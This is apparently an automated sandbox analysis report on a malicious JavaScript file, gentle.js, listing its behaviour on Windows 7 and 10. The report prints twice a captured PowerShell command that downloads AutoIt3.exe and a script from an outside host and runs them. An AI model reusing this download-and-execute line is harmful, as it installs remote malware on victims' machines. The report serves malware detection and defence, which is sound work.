Analysis Overview
SHA256: 4dce8991fb2942cb8443aba697311072aa25fc61b4b4186a54e7956c2bec6799
Threat Level: Shows suspicious behavior
The file gentle.js was found to show suspicious behavior.
Malicious Activity Summary
Checks computer location settings
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2023-11-01 21:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2023-11-01 21:26
Reported: 2023-11-01 21:29
Platform: win7-20231023-en
Max time kernel: 118s
Max time network: 122s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1632 wrote to memory of 3040 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1632 wrote to memory of 3040 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1632 wrote to memory of 3040 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gentle.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351/msikrxeiths' -OutFile 'krxeiths.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'krxeiths.au3'"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted: 2023-11-01 21:26
Reported: 2023-11-01 21:29
Platform: win10v2004-20231023-en
Max time kernel: 11s
Max time network: 22s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4328 wrote to memory of 4716 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4328 wrote to memory of 4716 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gentle.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351/msikrxeiths' -OutFile 'krxeiths.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'krxeiths.au3'"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |